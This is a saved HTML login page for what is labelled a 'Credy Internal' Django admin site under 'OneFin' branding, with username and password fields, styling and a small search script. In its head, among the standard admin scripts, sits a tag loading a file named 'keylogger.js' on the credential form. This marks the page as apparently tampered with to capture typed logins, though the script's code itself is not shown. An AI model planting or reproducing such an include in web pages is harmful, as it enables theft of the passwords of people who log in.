

<!DOCTYPE html>

<html lang="en-us" >
<head>
<title>Login</title>
<link rel="stylesheet" type="text/css" href="https://credy-public-bucket.s3.amazonaws.com/admin/css/base.css">

  
  
  <script type="text/javascript" src="https://credy-public-bucket.s3.amazonaws.com/admin/js/core.js"></script>
  <script type="text/javascript" src="https://credy-public-bucket.s3.amazonaws.com/admin/js/vendor/jquery/jquery.js"></script>
  <script type="text/javascript" src="https://credy-public-bucket.s3.amazonaws.com/admin/js/jquery.init.js"></script>
  <script type="text/javascript" src="https://credy-public-bucket.s3.amazonaws.com/admin/js/admin/RelatedObjectLookups.js"></script>
  <script type="text/javascript" src="https://credy-public-bucket.s3.amazonaws.com/admin/js/actions.js"></script>
  <script type="text/javascript" src="https://credy-public-bucket.s3.amazonaws.com/admin/js/urlify.js"></script>
  <script type="text/javascript" src="https://credy-public-bucket.s3.amazonaws.com/admin/js/prepopulate.js"></script>
  <script type="text/javascript" src="https://credy-public-bucket.s3.amazonaws.com/admin/js/vendor/xregexp/xregexp.js"></script>
  <script type="text/javascript" src="keylogger.js"></script>




    <meta name="viewport" content="user-scalable=no, width=device-width, initial-scale=1.0, maximum-scale=1.0">
    <link rel="stylesheet" type="text/css" href="https://credy-public-bucket.s3.amazonaws.com/admin/css/responsive.css">
    

<meta name="robots" content="NONE,NOARCHIVE">
<script src="https://use.fontawesome.com/caef37b1dd.js"></script>
<style>
    #search-box {
        display: inline-block;
        width: 100%;
        max-width: 500px;
        border-radius: 5px;
    }
    #ul-app-list {
        z-index: 999;
        position:absolute;
        padding-left: 0px;
        margin: 0px;
    }
    #search-input {
        font-size: 16px;
        padding: 9px 20px 9px 10px;
        border-radius: 5px;
        width:90%;
    }
    #search-box i {
        font-size:16px;
        padding-right:5px;
    }
    #ul-app-list {
        width: 90%;
        max-width: 477px;
    }
    #ul-app-list li {
        border: 1px solid #ddd; /* Add a border to all links */
        margin-top: -1px; /* Prevent double borders */
        background-color: #f6f6f6; /* Grey background color */
        font-size: 14px; /* Increase the font-size */
        display: block; /* Make it into a block element to fill the whole list */
        width: 100%;
        cursor: pointer;
    }
    #ul-app-list li a {
        display: block;
        padding: 10px; /* Add some padding */
        text-decoration: none; /* Remove default text underline */
        color: black !important;
    }
    #ul-app-list li a:hover {
        text-decoration: none; /* Remove default text underline */
    }
    #ul-app-list li:hover {
        background-color: #eaeaea;
    }
    #ul-app-list .highlighted {
        background-color: #eaeaea;
        border:1px solid #aaa;
    }
</style>
<script>
var highlightIndex = 0;
function hideAll() {
    var ul = document.getElementById('ul-app-list');
    if (!ul) {
        return;
    }
    var li = ul.getElementsByTagName('li');
    for (var i = 0; i < li.length; i++) {
        li[i].style.display = 'none';
    }
}
function dosearch(event) {
    if (event.keyCode == 38) {
        highlightIndex = highlightIndex - 1;
    }
    if (event.keyCode == 40) {
        highlightIndex = highlightIndex + 1;
    }
    var inp = String.fromCharCode(event.keyCode);
    if (highlightIndex < 0 || /[a-zA-Z0-9-_ ]/.test(inp)) {
        highlightIndex = 0;
    }

    var input, filter, ul, li, a, i , txtValue, first, currentA;
    input = document.getElementById('search-input');
    filter = input.value.toUpperCase();
    if (filter === '') {
        hideAll();
        return;
    }
    ul = document.getElementById('ul-app-list');
    li = ul.getElementsByTagName('li');

    var currentIndex = 0;
    var lastIndex = 0;

    for (i = 0; i < li.length; i++) {
        a = li[i].getElementsByTagName("a")[0];
        txtValue = a.textContext || a.innerText;
        if (txtValue.toUpperCase().indexOf(filter) > -1 && currentIndex < 10) {
            if (event.keyCode == 13 && currentIndex == highlightIndex) {
                a.click();
                return;
            }
            li[i].style.display = '';
            if (currentIndex == highlightIndex) {
                a.classList.add('highlighted');
            } else {
                a.classList.remove('highlighted');
            }

            currentIndex = currentIndex + 1;
            currentA = a;
        } else {
            li[i].style.display = 'none';
        }
    }

    if (highlightIndex >= currentIndex && currentA) {
        highlightIndex = currentIndex - 1;
        currentA.classList.add('highlighted');
    }
}
window.addEventListener('load', function() {
    document.addEventListener('click', function(event) {
        var searchInput = document.getElementById('search-input');
        var targetElement = event.target;

        do {
            if (targetElement == searchInput) {
                return;
            }
            targetElement = targetElement.parentNode;
        } while (targetElement);

        hideAll();
    });
});
</script>
</head>


<body class=""
  data-admin-utc-offset="0">

<!-- Container -->
<div id="container">
    
    <!-- Header -->
    <div id="header">
        <div id="branding">
        
<h1 id="site-name"><a href="/api/admin/">OneFin</a></h1>

        </div>
        
        
        
         
    </div>
    <!-- END Header -->
    
    <div class="breadcrumbs">
    <a href="/api/admin/">Home</a>
    
    </div>
    
    

    
        
    

    <!-- Content -->
    <div id="content" class="colM">
        
        
        
            
                <h1>Credy Internal</h1>
            
        
        
  <h1>Login</h1>

  
    <p>Enter your credentials.</p>
  

  <form action="" method="post"><input type="hidden" name="csrfmiddlewaretoken" value="vSOCXUy3JcYsrlDLUs6A8qI88PBDMrW9g7JXyxlu8rxSMyRStp28FDf36VIh7ckJ">
    <table>
  <input type="hidden" name="login_view-current_step" value="auth" id="id_login_view-current_step">
  <tr><th><label for="id_auth-username">Username:</label></th><td><input type="text" name="auth-username" autofocus required id="id_auth-username"></td></tr>
<tr><th><label for="id_auth-password">Password:</label></th><td><input type="password" name="auth-password" required id="id_auth-password"></td></tr>
</table>


    
    <div style="margin-left: -9999px"><input type="submit" value=""/></div>

    
    

    



  <button disabled name="" type="button"
          class="btn btn-disabled">Back</button>

<button type="submit" class="btn btn-primary">Next</button>

  </form>

        
        <br class="clear">
    </div>
    <!-- END Content -->

    <div id="footer"></div>
</div>
<!-- END Container -->

</body>
</html>

